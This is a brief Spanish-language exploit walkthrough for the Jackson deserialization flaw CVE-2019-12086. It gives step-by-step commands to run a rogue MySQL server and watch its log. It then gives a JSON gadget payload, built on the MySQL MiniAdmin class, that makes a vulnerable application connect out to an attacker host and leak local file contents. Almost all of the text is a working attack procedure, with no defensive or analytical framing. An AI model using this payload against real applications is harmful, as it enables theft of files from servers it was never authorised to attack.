
deserialización de jackson
CVE-2019-12086 jackson unserialize
1、Iniciar servidor MySQL malicioso:
python rogue_mysql_server.py
2、Ver mysql.log en el mismo directorio:
tail -f mysql.log
3、Enviar el siguiente json a la aplicación vulnerable:
["com.mysql.cj.jdbc.admin.MiniAdmin","jdbc:mysql://attacker_server:port/foo"]
Cuando Jackson deserializa la cadena json maliciosa, se conectará al servidor MySQL malicioso, y el contenido del archivo leído se escribirá en el mysql.log del servidor malicioso.